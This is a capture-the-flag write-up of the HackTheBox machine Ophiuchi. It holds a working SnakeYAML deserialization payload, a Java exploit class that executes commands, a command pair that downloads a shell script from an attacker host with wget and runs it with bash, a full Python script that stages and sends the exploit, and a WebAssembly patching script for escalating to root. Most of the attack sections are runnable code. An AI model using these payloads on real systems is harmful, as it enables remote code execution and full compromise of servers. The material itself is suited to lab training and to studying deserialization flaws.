HackTheBox — Ophiuchi

Nmap scan

Nmap scan report for 10.10.10.227 (10.10.10.227)
Host is up (0.32s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open http Apache Tomcat 9.0.38
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Parse YAML
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.18 seconds

HTTP Enumeration

!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]

yaml/exploit.java

package yaml;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

// Loaded on the target by the URLClassLoader from the YAML payload. ScriptEngineManager
// instantiates every ScriptEngineFactory provider it discovers, so the constructor is
// the code-execution point; the remaining methods only satisfy the interface.
public class exploit implements ScriptEngineFactory {

    public exploit() {
        try {
            // Out-of-band check: a ping from the target confirms the class was loaded.
            Runtime.getRuntime().exec("ping -c 2 10.10.16.5");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public String getEngineName() {
        return null;
    }

    @Override
    public String getEngineVersion() {
        return null;
    }

    @Override
    public List<String> getExtensions() {
        return null;
    }

    @Override
    public List<String> getMimeTypes() {
        return null;
    }

    @Override
    public List<String> getNames() {
        return null;
    }

    @Override
    public String getLanguageName() {
        return null;
    }

    @Override
    public String getLanguageVersion() {
        return null;
    }

    @Override
    public Object getParameter(String key) {
        return null;
    }

    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    @Override
    public String getProgram(String... statements) {
        return null;
    }

    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }
}
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]
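Packaging the class so the gadget actually reaches it, as an added example that is not part of the original write-up: ScriptEngineManager, handed the URLClassLoader, asks ServiceLoader for ScriptEngineFactory implementations, which means fetching META-INF/services/javax.script.ScriptEngineFactory from the attacker URL and instantiating every class that file names. The script below writes that service file, builds the YAML with the trailing slash URLClassLoader needs to treat the URL as a directory base rather than a jar, checks that the compiled class (from javac -d webroot yaml/exploit.java) is in place, and serves the tree. The attacker address 10.10.16.5:8000 is the one used later on the page; the form field name `data` in send_payload is an assumption, since the page does not show the request.

```python
"""Stage the SnakeYAML -> ScriptEngineManager -> URLClassLoader gadget used above."""
import functools
import http.server
from pathlib import Path
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# ServiceLoader looks for this resource relative to the URLClassLoader's base URL.
SERVICE_FILE = "META-INF/services/javax.script.ScriptEngineFactory"

PAYLOAD_TEMPLATE = """!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["{url}"]
  ]]
]"""


def yaml_payload(attacker_url: str) -> str:
    """Build the YAML document that makes the server load classes from attacker_url.

    URLClassLoader treats a URL ending in '/' as a directory base and one without
    as a jar, so the trailing slash is enforced: the loader then fetches
    <base>/META-INF/services/... and <base>/yaml/exploit.class as plain files.
    """
    if not attacker_url.endswith("/"):
        attacker_url += "/"
    return PAYLOAD_TEMPLATE.format(url=attacker_url)


def write_provider_tree(webroot, provider_class: str = "yaml.exploit") -> Path:
    """Create the service-provider file naming the class to instantiate.

    ScriptEngineManager(ClassLoader) reads this file through ServiceLoader and
    instantiates every listed class, which is what runs exploit's constructor.
    """
    service = Path(webroot) / SERVICE_FILE
    service.parent.mkdir(parents=True, exist_ok=True)
    service.write_text(provider_class + "\n")
    return service


def class_file_path(webroot, provider_class: str = "yaml.exploit") -> Path:
    """Where `javac -d <webroot> yaml/exploit.java` leaves the compiled class."""
    return Path(webroot).joinpath(*provider_class.split(".")).with_suffix(".class")


def tree_is_ready(webroot, provider_class: str = "yaml.exploit") -> bool:
    """True when both the service file and the compiled class are in place."""
    service = Path(webroot) / SERVICE_FILE
    if not service.is_file():
        return False
    listed = [ln.strip() for ln in service.read_text().splitlines() if ln.strip()]
    return provider_class in listed and class_file_path(webroot, provider_class).is_file()


def serve(webroot, port: int = 8000) -> None:
    """Serve the tree over HTTP (blocking); this is what the payload's URL points at."""
    handler = functools.partial(http.server.SimpleHTTPRequestHandler, directory=str(webroot))
    http.server.ThreadingHTTPServer(("0.0.0.0", port), handler).serve_forever()


def send_payload(target: str, payload: str, field: str = "data") -> int:
    """POST the YAML to the parser page. The field name is an assumption, not from the page."""
    req = Request(target, data=urlencode({field: payload}).encode(), method="POST")
    with urlopen(req, timeout=10) as resp:
        return resp.status


if __name__ == "__main__":
    root = Path("webroot")
    write_provider_tree(root)
    print(yaml_payload("http://10.10.16.5:8000"))
    print("class file expected at:", class_file_path(root))
    print("tree ready:", tree_is_ready(root))
```

Compile with javac -d webroot yaml/exploit.java, confirm tree_is_ready(), start serve(), then submit yaml_payload(...) to the Parse YAML page; the target's class loader will request the service file and then yaml/exploit.class from that server, and the ping arrives when the constructor runs.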

Initial Foothold

// Replaces the ping in the exploit constructor. wget's -O writes the download to the given
// path (-w is --wait and rejects a path). The two commands run as separate processes, so
// either call waitFor() on the first Process or chain them in one "bash -c" so that bash
// does not start before the file exists.
Runtime.getRuntime().exec("wget http://10.10.16.5:8000/shell.sh -O /tmp/shell.sh");
Runtime.getRuntime().exec("bash /tmp/shell.sh");

Lateral Movement

Getting root

The program checks the value f returned from main.wasm:
  • If f != 1 ==> "Not ready to deploy"
  • If f == 1 ==> "Ready to deploy", and the deploy.sh file is executed.
./wasm2wat main.wasm -o main.wat     # disassemble to text so the return value can be edited
mv main.wasm main.wasm.bak
# edit main.wat so the checked function returns 1, then reassemble:
./wat2wasm main.wat -o main.wasm     # wat2wasm (not wasm2wat) turns the edited text back into binary
chmod +x main.wasm deploy.sh
echo 'echo $(id);' > deploy.sh       # deploy.sh runs with the privileges of the program that executes it
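The step between the two conversions, editing main.wat so the checked function returns 1, is what the commands above leave implicit. As an added example (not the write-up's own tooling), the following Python locates the function behind a given export in a .wat file and rewrites its last i32.const, handling both $symbol and numeric function references as wasm2wat emits them. The WAT text inside it is constructed for the example, and the export name info is a placeholder for whichever function the program calls. Run wasm2wat before it and wat2wasm after it, as above.

```python
"""Flip the return value of an exported WebAssembly function in its .wat text form."""
import re

# Constructed for this example: what a wasm2wat dump of a two-function module looks like.
SAMPLE_WAT = """(module
  (type (;0;) (func (result i32)))
  (func $info (type 0) (result i32)
    i32.const 0)
  (func $other (type 0) (result i32)
    i32.const 0)
  (export "info" (func $info))
  (export "other" (func $other)))
"""


def _sexpr_end(text: str, start: int) -> int:
    """Index just past the s-expression that opens at text[start]."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == "(":
            depth += 1
        elif text[i] == ")":
            depth -= 1
            if depth == 0:
                return i + 1
    raise ValueError("unbalanced s-expression")


def _module_children(wat: str):
    """Yield (start, end) spans of the top-level forms inside (module ...)."""
    mstart = wat.index("(module")
    mend = _sexpr_end(wat, mstart)
    i = mstart + len("(module")
    while i < mend - 1:
        if wat[i] == "(":
            end = _sexpr_end(wat, i)
            yield i, end
            i = end
        else:
            i += 1


def find_func(wat: str, export_name: str):
    """Span of the (func ...) form behind an export, referenced by $symbol or by index."""
    m = re.search(r'\(export\s+"' + re.escape(export_name) + r'"\s+\(func\s+([^)\s]+)\)', wat)
    if not m:
        raise ValueError(f"no export named {export_name!r}")
    ref = m.group(1)
    funcs = [(s, e) for s, e in _module_children(wat) if wat.startswith("(func", s)]
    if ref.startswith("$"):
        for s, e in funcs:
            if re.match(r"\(func\s+" + re.escape(ref) + r"(?=[\s)])", wat[s:e]):
                return s, e
        raise ValueError(f"no function {ref}")
    # Numeric reference: assumes the module imports no functions, which would shift the index.
    return funcs[int(ref)]


def patch_return_constant(wat: str, export_name: str, value: int = 1):
    """Rewrite the last i32.const of the exported function; returns (new_wat, old_value)."""
    s, e = find_func(wat, export_name)
    body = wat[s:e]
    consts = list(re.finditer(r"i32\.const\s+(-?\d+)", body))
    if not consts:
        raise ValueError("function pushes no i32 constant to patch")
    last = consts[-1]
    body = body[: last.start(1)] + str(value) + body[last.end(1):]
    return wat[:s] + body + wat[e:], int(last.group(1))


if __name__ == "__main__":
    patched, old = patch_return_constant(SAMPLE_WAT, "info")
    print(f"info returned {old}, now returns 1:\n{patched}")
```

Only the function behind the named export is touched; other functions keep their constants, so the rest of the module still assembles unchanged.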

0xEmbo


I am a Penetration Testing Enthusiast with a computer science background, also interested in CTFs and Python scripting.